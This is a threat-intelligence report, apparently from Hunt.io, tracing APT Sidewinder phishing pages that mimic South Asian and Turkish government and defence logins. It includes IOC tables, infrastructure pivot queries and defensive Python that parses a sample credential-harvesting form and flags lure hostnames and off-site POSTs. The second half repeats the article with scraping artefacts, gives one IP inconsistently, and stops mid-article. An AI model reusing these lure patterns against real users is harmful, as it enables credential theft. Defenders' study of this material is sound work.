APT Sidewinder Spoofs Government and Military Institutions to Target South Asian Countries with Credential Harvesting Techniques

Published on

Aug 8, 2025

APT Sidewinder Abuses Netlify to Mimic Government and Military Portals in South Asia

APT Sidewinder, a persistent threat group believed to originate from South Asia, has consistently targeted military and government entities across Bangladesh, Sri Lanka, Turkey, Nepal, Pakistan, and other neighboring countries. Sidewinder frequently relies on spear-phishing with weaponized documents and malicious links. These campaigns mimic official communications to trick victims into entering credentials on fake login pages.

Key Takeaways

  • APT SideWinder impersonates government and defense agencies across Nepal, Bangladesh, and Turkey, recreating their login interfaces using Netlify and Pages.dev to host phishing lures.

  • Spoofed Zimbra and Secure Portal Pages were made to look like official government email, file-sharing, or document upload services, prompting victims to submit credentials through fake login panels.

  • Both mailbox3-inbox1-bd.com and mailbox-inbox-bd.com were used as credential collection endpoints, indicating backend reuse and infrastructure redundancy.

  • Deployment of variants such as mailbox-inbox-bd.com/gov.ph and /pol3.php suggests redundant collection paths likely meant to ensure campaign continuity.

  • Over a dozen phishing domains were identified, each mimicking different agencies (DGDP, DGFI, Police, National Webmail, Roketsan/ASELSAN), indicating broad sectoral targeting.

Initial Discovery

The investigation starts with a phishing attack on Nepal's Ministry of Defense (MOD), shared by researcher "Demon" on Twitter and attributed to APT Sidewinder.

Figure 1. Phishing attack shared by Demon showing the login page for "Government of Nepal"

These initial findings opened a deeper dive into APT Sidewinder's ongoing campaign and its use of fake Zimbra pages as lures.

Zimbra is a popular enterprise email platform often mimicked in phishing campaigns to steal login credentials.

Investigation

The initial investigation reveals a Fake Zimbra page (https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.html) impersonating the Government of Nepal's Centralized Email System, hosted on Netlify, a free static hosting service often abused by threat actors to quickly spin up phishing pages.

Figure 2. A fake Zimbra login panel hosted at mail-mod-gov-np-account-file-data[.]netlify[.]app prompted users to enter credentials that were POSTed to mailbox3-inbox1-bd[.]com.

Further inspection of the HTML source shows the page title set to "Zimbra Web Client Sign In", the same title the legitimate Zimbra login page carries.

Figure 3. Phishing page mimicking the Zimbra login interface while retaining the legitimate 'Zimbra Web Client Sign In' title to appear authentic.

Moreover, the phishing page contains a form that silently submits the entered credentials via an HTTP POST to the attacker-controlled server https://mailbox3-inbox1-bd.com/3456.php.

Figure 4. Silent POST submission to https://mailbox3-inbox1-bd[.]com/3456.php observed in the phishing page
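The check behind Figures 3 and 4 (a webmail-titled page whose login form POSTs to a host outside the page's own domain) can be automated over crawled HTML. The following is an added example, not code from the Hunt.io report; the sample page body is constructed to match the behaviour described above, and parent_domain() is a deliberately coarse stand-in for registrable-domain logic.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed page body modelled on what Figures 3 and 4 describe: a Zimbra-titled
# login form whose action points at an outside .php endpoint. Not the actual lure page.
SAMPLE_PAGE_URL = "https://mail-mod-gov-np-account-file-data.netlify.app/bof.html"
SAMPLE_HTML = """<html><head><title>Zimbra Web Client Sign In</title></head>
<body>
<form method="post" action="https://mailbox3-inbox1-bd.com/3456.php" id="loginForm">
  <input type="text" name="username">
  <input type="password" name="password">
  <input type="submit" value="Sign In">
</form>
</body></html>"""


class FormExtractor(HTMLParser):
    """Collect the <title> text and the action/method of every <form>."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.forms = []
        self._in_title = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "title":
            self._in_title = True
        elif tag == "form":
            self.forms.append({"action": a.get("action") or "",
                               "method": (a.get("method") or "get").lower()})

    def handle_endtag(self, tag):
        if tag == "title":
            self._in_title = False

    def handle_data(self, data):
        if self._in_title:
            self.title += data


def parent_domain(host, labels=2):
    """Last two labels of a hostname; a coarse stand-in for the registrable domain.
    Two unrelated *.netlify.app sites compare equal here, which is acceptable for
    this heuristic but should be refined with a public-suffix list in production."""
    return ".".join(host.lower().split(".")[-labels:])


def analyse_page(page_url, html):
    """Return one finding per form: where it submits and whether that leaves the site."""
    parser = FormExtractor()
    parser.feed(html)
    page_host = urlsplit(page_url).hostname or ""
    findings = []
    for form in parser.forms:
        action_url = urljoin(page_url, form["action"])  # relative actions stay on the page host
        action_host = urlsplit(action_url).hostname or ""
        cross_site = parent_domain(action_host) != parent_domain(page_host)
        findings.append({
            "title": parser.title.strip(),
            "method": form["method"],
            "action": action_url,
            "action_host": action_host,
            "cross_site_post": cross_site and form["method"] == "post",
        })
    return findings


def looks_like_credential_lure(page_url, html):
    """A page whose title mimics a sign-in screen and whose form POSTs off-site
    is exactly the pattern the report's Figures 3 and 4 show."""
    return any(f["cross_site_post"] and "sign in" in f["title"].lower()
               for f in analyse_page(page_url, html))


if __name__ == "__main__":
    for finding in analyse_page(SAMPLE_PAGE_URL, SAMPLE_HTML):
        print(finding)
    print("credential lure:", looks_like_credential_lure(SAMPLE_PAGE_URL, SAMPLE_HTML))
```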

Pivoting Infrastructure

This phishing domain “mailbox3-inbox1-bd[.]com” currently resolves to the IP address 146.70.118.226. At first glance, nothing about the host screams C2 traffic or known malware behavior. However, we did spot one phishing-related indicator suggesting the domain is part of an ongoing malicious campaign. The scan revealed no open directories or clear indicators of compromise (IOCs), and although WHOIS information is accessible, the registration details do not appear immediately suspicious.

Figure 5. mailbox3-inbox1-bd[.]com data found using Hunt.io intelligence

The IP address 146.70.118.226 is hosted by M247 Europe SRL in Frankfurt, Germany (AS9009). Its reverse DNS points to monovm.host, a VPS provider often associated with anonymity-oriented or abuse-tolerant hosting, while forward DNS resolves to webdisk.ichigotour.com, a domain that appears benign but may be part of a misused shared hosting environment.

Figure 6. 146.70.118.226 records found using Hunt.io intelligence

A large number of common service ports are exposed, including FTP (21), HTTP/HTTPS (80, 443), POP3 (110), IMAP (143), secure email ports (993, 995), and several cPanel/webmail management interfaces such as 2083, 2087, 2095, 2096, 2077, 2078, which are typically seen on shared hosting. The presence of SSH on a non-standard port (2041) and an unknown service running on port 52230 were also observed.

Figure 7. Port history for 146.70.118.226 shows multiple open ports

To uncover the broader infrastructure leveraged by APT Sidewinder, we utilized HuntSQL™ (Hunt.io’s SQL-like interface that allows pivoting across massive infrastructure datasets) to pivot within an indexed web crawl dataset, starting from the previously identified suspicious domain: mailbox3-inbox1-bd.com.

HuntSQL query:

SELECT
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox3-inbox1-bd.com%'
AND timestamp > '2025-01-01'

Output:

Figure 8. SQL query for searching similar URLs with a POST request to mailbox3-inbox1-bd[.]com

The results show that a total of 9 unique phishing URLs were identified using lures targeting Bangladesh and Turkey. These phishing pages imitate government login portals and exfiltrate credentials using POST requests to attacker-controlled infrastructure.

Here is a breakdown of the phishing URLs, their visual lures (titles), and POST requests.

URL | Title | POST Request
https://dgdp-account-file-data-doc-procuremen.netlify.app/ | Dgdp Secured File System | https://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf= | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/ | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/ | IDEF Secured File System | https://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf= | mail.aselsan.com.tr | https://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/ | Roketsan Drive | https://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/ | IDEF Secured File System | https://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf= | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/ | Roketsan Drive | https://mailbox3-inbox1-bd.com/idef.php

Observation

  1. Domain Theming: All front-end domains are hosted on free services like Netlify and Pages.dev, commonly abused for fast, anonymous hosting.

  2. Consistent Backend: Despite different phishing lures (DGDP, Roketsan, ASELSAN, IDEF), all forms submit data to mailbox3-inbox1-bd.com, confirming it as a centralized credential collection point.

  3. Reused POST Scripts: Reuse of scripts like /2135.php and /idef.php across different phishing kits indicates automation or a template-based deployment model.

To better understand the scope of the campaign, the following table summarizes each unique phishing URL identified, along with its targeted country, impersonated organization, and a brief description of the lure used.

# | Target Country | Department/Entity | Description
1 | Bangladesh | DGDP (Directorate General of Defence Procurement) | Fake "DGDP Secured File System" page used to lure victims into uploading or accessing procurement-related documents.
2 | Bangladesh | Ministry of Defence (MoD) | Mimics the Zimbra login page to harvest credentials, targeting government email access.
3 | Bangladesh | BAF (Bangladesh Air Force) | Another Zimbra-themed phishing page aimed at compromising military personnel's email accounts.
4 | Turkey | IDEF (International Defence Industry Fair) | Impersonates a secure portal related to IDEF 2025, targeting Turkish defense contractors or officials.
5 | Turkey | ASELSAN | Mimics an aselsan.com.tr email or file access page, used to phish employees of Turkey's largest defense company.
6 | Turkey | ROKETSAN | Fake "Roketsan Drive" login, likely targeting file access credentials of Turkish missile manufacturer staff.
7 | Turkey | IDEF (International Defence Industry Fair) | Another IDEF phishing variant, suggesting multiple attempts to target different user flows.
8 | Bangladesh | BOF (Bangladesh Ordnance Factories) | Zimbra-themed login targeting a critical defense manufacturer in Bangladesh.
9 | Turkey | ROKETSAN | Duplicate "Roketsan Drive" variant using a slightly different domain; highlights reuse and variation of lures.

To pivot on page titles, we collected the titles observed above and built a query to extract matching records from the crawler database, restricted to entries from January 1, 2025 onward to capture recent activity and potential campaign footprints.

SELECT
    *
FROM
    crawler
WHERE
    title == 'Dgdp Secured File System'
AND timestamp > '2025-01-01'

After testing the identified page titles across broader sources, one more phishing URL was uncovered using the same visual lure, "Dgdp Secured File System". This reuse across domains points to a template-based approach, likely intended to ensure campaign continuity even if individual URLs are blocked.

Figure 9. Pivoting on the title "Dgdp Secured File System" to hunt for similar webpages linked to similar infrastructure

This POST destination (mailbox-inbox-bd.com) is structurally and linguistically similar to the original collection server (mailbox3-inbox1-bd.com), suggesting shared malicious infrastructure or a backup exfiltration path used by the same threat actor, here targeting Bangladesh's Directorate General Defence Purchase (DGDP).

URL | Title | POST Request
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNcl | Dgdp Secured File System | https://mailbox-inbox-bd.com/dgdp/109y.php

The domain “mailbox-inbox-bd[.]com” shows 4 phishing URLs that also resolved to the same IP address 146.70.118.226. The scan revealed no open directories or obvious IOCs, and while WHOIS information is available, the registration details do not raise immediate suspicion.

Figure 10. Phishing URLs related to “mailbox-inbox-bd[.]com” using Hunt.io intelligence

Both mailbox3-inbox1-bd[.]com and mailbox-inbox-bd[.]com resolve to the same IP address 146.70.118.226, suggesting they are part of the same phishing infrastructure operated by a common threat actor.

Continuing the infrastructure hunt, a query using the URL pattern netlify.app/?pdf= revealed a new phishing page impersonating DGFI (Directorate General of Forces Intelligence), Bangladesh's military intelligence agency.

SELECT
    *
FROM
    crawler
WHERE
    url LIKE '%netlify.app/?pdf=%'
AND url LIKE '%gov-bd%'
AND timestamp > '2025-01-01'

Output:

Figure 11. SQL query to hunt for the URL pattern "%netlify.app/?pdf=%", which is repeatedly seen in the observed URLs

The inclusion of a .gov.bd email address in the query string indicates a successful spear-phishing attempt:

https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bd

Using the URL mailbox-inbox-bd.com in the body field, two additional phishing URLs were identified, both following the same Zimbra-themed lure and targeting sensitive Bangladeshi government entities:

SELECT
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox-inbox-bd.com%'
AND timestamp > '2025-04-01'

Output:

Figure 12. SQL query for searching similar URLs with a POST request to mailbox-inbox-bd[.]com

One spoofed the National Webmail Portal (mail.gov.bd) using a Zimbra-based lure, while the other impersonated the Bangladesh Police webmail login; both exfiltrate credentials via the attacker-controlled domain mailbox-inbox-bd.com.

URL | Title | POST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXz | Zimbra Web Client Sign In | https://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFP | Zimbra Web Client Sign In | https://mailbox-inbox-bd.com/pol/pol3.php

# | Target Country | Department/Entity | Description
1 | Bangladesh | National Webmail Portal | Phishing site spoofing mail.gov.bd, with a Zimbra lure and backend at mailbox-inbox-bd.com/gov.ph.
2 | Bangladesh | Bangladesh Police | Spoofed Police webmail login at webmail.police.gov.bd, using mailbox-inbox-bd.com/pol/pol3.php to exfiltrate credentials.

Attribution and Overlaps

The Sidewinder APT group continues to aggressively target government and defense sectors across South Asia, particularly Bangladesh, Sri Lanka, Nepal, and Pakistan. Recent phishing infrastructure uncovered in our hunt includes attacker-registered domains such as updatemind52.com and subdomains on netlify.app and pages.dev, all designed to mimic official portals like mail.gov.bd, police.gov.bd, and dgdp.gov.bd. These domains hosted credential-harvesting pages with highly convincing templates, some directly impersonating Zimbra Web Client interfaces.

As shown in the Sidewinder attack reported by @SecAI_AI, domains like mail-mod-gov-bd-account-data-file[.]netlify[.]app and phishing URLs such as hxxps://mails.mofa.gov.np.updatemaster[.]info/mail/?_task=login highlight the group's tactic of chaining legitimate-looking subdomains onto deceptive second-level domains (e.g., updatemaster[.]info).

Figure 13. APT Sidewinder attribution for "updatemaster[.]info" and mail-mod-gov-bd-account-data-file[.]netlify[.]app from an X post

These patterns precisely align with our hunt, where we identified three domains: mail.gov.bd.account.file.updatemind52[.]com, webmail.police.gov.bd.updatemind52[.]com, and dgdp.cloud.secured.file.updatemind52.com. Both the naming format and the use of attacker-controlled parent domains like updatemind52.com confirm the replication of Sidewinder's infrastructure across campaigns.

The second Sidewinder attack, reported by @blackorbird, provides additional context: the phishing domain mail-defence-lk-session-out.pages[.]dev was used to mimic the Sri Lankan Ministry of Defence. This mirrors the domains we uncovered, such as mail-baf-mil-bd-account-data-files-document.pages.dev and mail-aselsans-com-tr-account-files-da.netlify.app, all hosted on Netlify or Pages.dev.

Figure 14. APT Sidewinder attribution for "netlify[.]app" from an X post showing reuse of similar infrastructure

The screenshots in the tweet show the reuse of visual elements like Zimbra login forms and official document previews, matching the behavior in our phishing samples. This consistent use of static site platforms, fake government-themed URLs, and credential-stealing POST methods reflects a broader infrastructure strategy by Sidewinder, aligning with patterns we’ve observed in prior campaigns.

Mitigation Strategies

  • Detect .php phishing pages served from domains that spoof military or gov.bd keywords.

  • Block Netlify-hosted spoofed domains, such as *.netlify.app names mimicking Bangladeshi government or military services.

  • Enforce MFA on all externally accessible services, especially webmail, VPNs, and government portals.

  • Monitor DNS resolutions to *.netlify.app and *.pages.dev domains containing gov/mil/army patterns.

  • Monitor HTTP requests with Zimbra login paths or anomalous User-Agent strings.

  • Security teams can write detections for unusual Zimbra login paths combined with unexpected HTTP POST behavior to external domains.
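The DNS and HTTP POST detections listed above, written out as an added example that is not part of the Hunt.io report. It assumes a simple key=value log format and an ORG_HOSTS allowlist, both constructed for this example; the lure hostnames and collection endpoints in the sample lines are taken from the report's tables, and the docs-team-site entries are benign controls.

```python
import re
from urllib.parse import urlsplit

# Free static-hosting suffixes the report saw abused for lure pages.
FREE_STATIC_SUFFIXES = ("netlify.app", "pages.dev")
# Tokens that, inside a free-hosted subdomain, imitate government/military names.
GOV_MIL_TOKENS = {"gov", "mil", "army", "mod", "mofa", "police", "defence", "defense"}
# Hostnames the organisation really operates (assumed allowlist, constructed here).
ORG_HOSTS = {"mail.gov.bd", "webmail.police.gov.bd"}

# Constructed DNS and web-proxy log lines (key=value format, constructed for this example).
DNS_LOG = [
    "2025-08-01T09:12:03Z client=10.1.2.3 qname=mail-mod-gov-bd-account-conf-files.netlify.app qtype=A",
    "2025-08-01T09:12:05Z client=10.1.2.3 qname=docs-team-site.netlify.app qtype=A",
    "2025-08-01T09:14:11Z client=10.1.2.9 qname=webmail.police.gov.bd.updatemind52.com qtype=A",
    "2025-08-01T09:15:00Z client=10.1.2.9 qname=mail.gov.bd qtype=A",
]
PROXY_LOG = [
    "2025-08-01T09:12:20Z client=10.1.2.3 method=POST url=https://mailbox3-inbox1-bd.com/2135.php referer=https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf= status=302",
    "2025-08-01T09:16:40Z client=10.1.2.9 method=POST url=https://mailbox-inbox-bd.com/gov.ph referer=https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXz status=200",
    "2025-08-01T09:20:00Z client=10.1.2.4 method=POST url=https://mail.gov.bd/zimbra/ referer=https://mail.gov.bd/ status=200",
    "2025-08-01T09:21:00Z client=10.1.2.5 method=GET url=https://docs-team-site.netlify.app/index.html referer=- status=200",
]

KV_RE = re.compile(r"(\w+)=(\S+)")


def parse_kv(line):
    """Parse a 'key=value key=value' line into a dict."""
    return dict(KV_RE.findall(line))


def on_free_static_host(host):
    return any(host == s or host.endswith("." + s) for s in FREE_STATIC_SUFFIXES)


def impersonation_tokens(host):
    """gov/mil-style tokens found in the subdomain part of a free-hosted name."""
    sub = host.lower()
    for s in FREE_STATIC_SUFFIXES:
        if sub.endswith("." + s):
            sub = sub[: -len(s) - 1]
    return sorted(set(re.split(r"[-.]", sub)) & GOV_MIL_TOKENS)


def lure_reason(host):
    """Why a hostname looks like one of the report's lure hosts, or None.
    Pattern 1: gov/mil tokens on *.netlify.app / *.pages.dev.
    Pattern 2: a real hostname chained in front of an attacker-controlled parent
    domain, as in mail.gov.bd.account.file.updatemind52.com."""
    host = host.lower().rstrip(".")
    if on_free_static_host(host) and impersonation_tokens(host):
        return "gov/mil tokens on free static hosting"
    for org in ORG_HOSTS:
        if host != org and host.startswith(org + "."):
            return f"org hostname {org} prefixed onto a foreign domain"
    return None


def check_dns(line):
    """Rule 1: a client resolved a lure-looking hostname."""
    rec = parse_kv(line)
    qname = rec.get("qname", "")
    reason = lure_reason(qname)
    if reason is None:
        return None
    return {"rule": "dns-lure-hostname", "client": rec.get("client"),
            "host": qname, "reason": reason}


def check_post(line):
    """Rule 2: a POST that left a lure page for a host the organisation does not own.
    Keying on the destination host rather than a '.php' suffix matters: the
    report's mailbox-inbox-bd.com/gov.ph endpoint carries no .php extension."""
    rec = parse_kv(line)
    if rec.get("method") != "POST":
        return None
    dst = (urlsplit(rec.get("url", "")).hostname or "").lower()
    src = (urlsplit(rec.get("referer", "")).hostname or "").lower()
    if dst in ORG_HOSTS or dst == src:
        return None
    reason = lure_reason(src)
    if reason is None:
        return None
    return {"rule": "post-from-lure-page", "client": rec.get("client"),
            "referer_host": src, "dst": dst, "reason": reason}


def run_detections(dns_log=DNS_LOG, proxy_log=PROXY_LOG):
    """Apply both rules and return the alerts in log order."""
    alerts = [a for a in map(check_dns, dns_log) if a]
    alerts += [a for a in map(check_post, proxy_log) if a]
    return alerts


if __name__ == "__main__":
    for alert in run_detections():
        print(alert)
```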

Proactively mapping attacker infrastructure remains one of the most effective ways to detect and stop threats like these before they escalate.

Conclusion

This investigation began with a phishing lure targeting Nepal's Ministry of Defense. Through infrastructure pivoting and domain analysis, the campaign's scope expanded to Bangladesh and Turkey, revealing a coordinated set of phishing attacks against government and military entities.

The consistent use of Netlify and Pages.dev, combined with centralized credential collection servers and cloned login portals, points to a sustained and scalable campaign. Attribution indicators and infrastructure overlaps reinforce previous links to APT Sidewinder.

Tracking infrastructure reuse across campaigns like this is critical. It gives defenders a practical advantage, helping detect threats early, enriching IOCs, and reducing attacker dwell time across targeted government and military environments.

APT Sidewinder Indicators of Compromise (IOCs)

URL | Title | POST Request
https://mail.gov.bd.account.file.updatemind52.com/CeqKyQXz | Zimbra Web Client Sign In | https://mailbox-inbox-bd.com/gov.ph
https://webmail.police.gov.bd.updatemind52.com/dPrSJhFP | Zimbra Web Client Sign In | https://mailbox-inbox-bd.com/pol/pol3.php
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNcl | Dgdp Secured File System | https://mailbox-inbox-bd.com/dgdp/109y.php
https://dgdp-account-file-data-doc-procuremen.netlify.app/ | Dgdp Secured File System | https://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf= | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/ | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/ | IDEF Secured File System | https://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf= | mail.aselsan.com.tr | https://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/ | Roketsan Drive | https://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/ | IDEF Secured File System | https://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf= | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/ | Roketsan Drive | https://mailbox3-inbox1-bd.com/idef.php
https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.html | Zimbra Web Client Sign In | https://mailbox3-inbox1-bd.com/2135.php
https://mail-dgfi-gov-bd-accounts-file-data-d.netlify.app/?pdf=ealb.gso2.protocol@dgfi.gov.bd | Zimbra Web Client Sign In | N/A

Additional IOCs

IOC | Type | Description
mailbox3-inbox1-bd.com | Domain | Credential exfiltration endpoint used in POST requests from multiple spoofed government and defense login portals.
mailbox-inbox-bd.com | Domain | Alternate credential collection domain, also receiving POST requests from phishing pages mimicking Zimbra and secured file systems.
146.70.118.226 | IP Address | Hosting infrastructure linked to the Sidewinder phishing campaign, likely associated with the above credential exfiltration domains.

APT Sidewinder, a persistent APT group believed to originate from South Asia, has consistently targeted military and government entities across Bangladesh, Srilanka, Turkey, Nepal, Pakistan, and other neighboring countries. Sidewinder frequently leverages spear-phishing techniques involving weaponized documents and malicious links. These campaigns mimic official communication to trick victims into entering credentials on fake login pages.

Key Takeaways

  • APT SideWinder impersonates government and defense agencies across Nepal, Bangladesh, and Turkey, recreating their login interfaces using Netlify and Pages.dev to host phishing lures.

  • Spoofed Zimbra and Secure Portal Pages were made to look like official government email, file-sharing, or document upload services, prompting victims to submit credentials through fake login panels.

  • Both mailbox3-inbox1-bd.com and mailbox-inbox-bd.com were used as credential collection endpoints, indicating backend reuse and infrastructure redundancy.

  • Deployment of variants such as mailbox-inbox-bd.com/gov.ph and /pol3.php suggests redundant collection paths likely meant to ensure campaign continuity.

  • Over a dozen phishing domains were identified, each mimicking different agencies (DGDP, DGFI, Police, National Webmail, Roketsan/ASELSAN), indicating broad sectoral targeting.

Initial Discovery

The investigation starts with an observed phishing attack on Nepal's Ministry of Defense (MOD) shared by researcher "Demon" on Twitter, attributed to APT Sidewinder.

Figure 1Figure 1. Phishing Attack shared by Demon showing the Login page for "Government of Nepal"

These initial findings enabled a deeper dive into the APT Sidewinder ongoing campaign and Fake Zimbra Pages as lure.

Zimbra is a popular enterprise email platform often mimicked in phishing campaigns to steal login credentials.

Investigation

The initial investigation reveals a Fake Zimbra page (https://mail-mod-gov-np-account-file-data[.]netlify[.]app/bof.html) impersonating the Government of Nepal's Centralized Email System, hosted on Netlify, a free static hosting service often abused by threat actors to quickly spin up phishing pages.

Figure 2Figure 2. A fake Zimbra login panel hosted at mail-mod-gov-np-account-file-data[.]netlify[.]app prompted users to enter credentials that were POSTed to mailbox3-inbox1-bd[.]com.

Further investigation shows the title of the webpage as Zimbra Web Client Sign In in the HTML source code.

Figure 3Figure 3. Phishing page mimicking Zimbra login interface while retaining the legitimate 'Zimbra Web Client Sign In' title to appear authentic.

Moreover, a suspicious form submission was observed in the phishing page, which uses the POST method to send user credentials to an attacker-controlled server https://mailbox3-inbox1-bd.com/3456.php silently.

Figure 4Figure 4. Silent POST submission to https://mailbox3-inbox1-bd[.]com/3456.php observed in phishing page

Pivoting Infrastructure

This phishing domain “mailbox3-inbox1-bd[.]com” currently resolves to the IP address 146.79.118.226. At first glance, there's nothing that screams C2 traffic or known malware behavior. However, we did spot one phishing-related indicator that suggests the domain may be part of an ongoing malicious campaign. The scan did not reveal any open directories or clear indicators of compromise (IOCs), and although WHOIS information is accessible, the registration details do not appear immediately suspicious.

Figure 5Figure 5. mailbox3-inbox1-bd[.]com data found using Hunt.io intelligence

The IP address 146.70.118.226, hosted by M247 Europe SRL in Frankfurt, Germany (AS9009) and its reverse DNS points to monovm.host, a known VPS provider often associated with anonymity or abuse-friendly hosting. Forward DNS resolves to webdisk.ichigotour.com, a domain name that appears benign but could potentially be part of a misused shared hosting environment.

Figure 6Figure 6. 146.70.118.226 records found using Hunt.io intelligence

A large number of common service ports are exposed, including FTP (21), HTTP/HTTPS (80, 443), POP3 (110), IMAP (143), secure email ports (993, 995), and several cPanel/webmail management interfaces such as 2083, 2087, 2095, 2096, 2077, 2078, which are typically seen on shared hosting. The presence of SSH on a non-standard port (2041) and an unknown service running on port 52230 were also observed.

Figure 7Figure 7. Port history for 146.70.118.226 shows multiple open ports

To uncover the broader infrastructure leveraged by APT Sidewinder, we utilized HuntSQL™ (Hunt.io’s SQL-like interface that allows pivoting across massive infrastructure datasets) to pivot within an indexed web crawl dataset, starting from the previously identified suspicious domain: mailbox3-inbox1-bd.com.

HuntSQL query:

SELECT 
    *
FROM
    crawler
WHERE
    body LIKE '%mailbox3-inbox1-bd.com%'
AND timestamp gt '2025-01-01'

                
Copy

Output:

Figure 8Figure 8. SQL Query for searching similar URLs with POST Request to mailbox3-inbox1-bd[.]com

The results show that a total of 9 unique phishing URLs were identified using lures targeting Bangladesh and Turkey. These phishing pages imitate government login portals and exfiltrate credentials using POST requests to attacker-controlled infrastructure.

Here is a breakdown of the phishing URLs, their visual lures (titles), and POST requests.

URLsTitlePOST Request
https://dgdp-account-file-data-doc-procuremen.netlify.app/Dgdp Secured File Systemhttps://mailbox3-inbox1-bd.com/dgdp12.php
https://mail-mod-gov-bd-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://mail-baf-mil-bd-account-data-files-document.pages.dev/Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://idef-2025-conf-data-file-tr-account-d.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef.php
https://mail-aselsans-com-tr-account-files-da.netlify.app/error.html?pdf=mail.aselsan.com.trhttps://mailbox3-inbox1-bd.com/asln/2.php
https://drive-rokectsaans-com-tr-account-file.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php
https://idef2025-com-tr-files-drive-account.netlify.app/IDEF Secured File Systemhttps://mailbox3-inbox1-bd.com/idef11.php
https://mail-bof-gov-file-account-conf-files.netlify.app/?pdf=Zimbra Web Client Sign Inhttps://mailbox3-inbox1-bd.com/2135.php
https://drive-roketsans-com-tr-account-files.netlify.app/Roketsan Drivehttps://mailbox3-inbox1-bd.com/idef.php

Observation

  1. Domain Theming: All front-end domains are hosted on free services like Netlify and Pages.dev, commonly abused for fast, anonymous hosting.

  2. Consistent Backend: Despite different phishing lures (DGDP, Roketsan, ASELSAN, IDEF), all forms submit data to mailbox3-inbox1-bd.com, confirming it as a centralized credential collection point.

  3. Reused POST Scripts: Reuse of scripts like /2135.php and /idef.php across different phishing kits indicates automation or a template-based deployment model.

To better understand the scope of the campaign, the following table summarizes each unique phishing URL identified, along with its targeted country, impersonated organization, and a brief description of the lure used.

#Target CountryDepartment/EntityDescription
1BangladeshDGDP (Directorate General of Defence Procurement)Fake "DGDP Secured File System" page used to lure victims into uploading or accessing procurement-related documents.
2BangladeshMinistry of Defence (MoD)Mimics Zimbra login page to harvest credentials, targeting government email access.
3BangladeshBAF (Bangladesh Air Force)Another Zimbra-themed phishing page aimed at compromising military personnel's email accounts.
4TurkeyIDEF (International Defence Industry Fair)Impersonates a secure portal related to IDEF 2025, targeting Turkish defense contractors or officials.
5TurkeyASELSANMimics an aselsan.com.tr email or file access page, used to phish employees of Turkey's largest defense company.
6TurkeyROKETSANFake "Roketsan Drive" login, likely targeting file access credentials of Turkish missile manufacturer staff.
7TurkeyIDEF (International Defence Industry Fair)Another variant of IDEF phishing suggests multiple attempts to target different user flows.
8BangladeshBOF (Bangladesh Ordnance Factories)Zimbra-themed login targeting a critical defense manufacturer in Bangladesh.
9TurkeyROKETSANDuplicate "Roketsan Drive" variant using a slightly different domain; highlights reuse and variation of lures.

In order to perform title pivoting, we explored all possible titles and built a query to extract relevant records from the crawler database. Our focus was on entries with the title within a defined time frame starting from January 1, 2025, to capture recent activity and potential campaign footprints.

SELECT 
    *
FROM
    crawler
WHERE
    title == 'Dgdp Secured File System'
AND timestamp gt '2025-01-01'

                
Copy

After testing the identified page titles across broader sources, one more phishing URL was uncovered using the same visual lure, "Dgdp Secured File System". This reuse across domains points to a template-based approach, likely intended to ensure campaign continuity even if individual URLs are blocked.

Figure 9Figure 9. Pivoting Title "Dgdp Secured File System" for hunting similar webpages linked to similar infrastructure

This POST destination (mailbox-inbox-bd.com) is structurally and linguistically similar to the original collection server (mailbox3-inbox1-bd.com), suggesting a shared malicious infrastructure or backup exfiltration path used by the same threat actor attacking Bangladesh DIRECTORATE GENERAL DEFENCE PURCHASE.

URLTitlePOST Request
https://dgdp.cloud.secured.file.updatemind52.com/FOWSMNclDgdp Secured File Systemhttps://mailbox-inbox-bd.com/dgdp/109y.php

The domain “mailbox-inbox-bd[.]comshows 4 phishing URLs that also resolved to the same IP address 146.70.118.226. The scan revealed no open directories or obvious IOCs, and while WHOIS information is available, the registration details do not raise immediate suspicion.

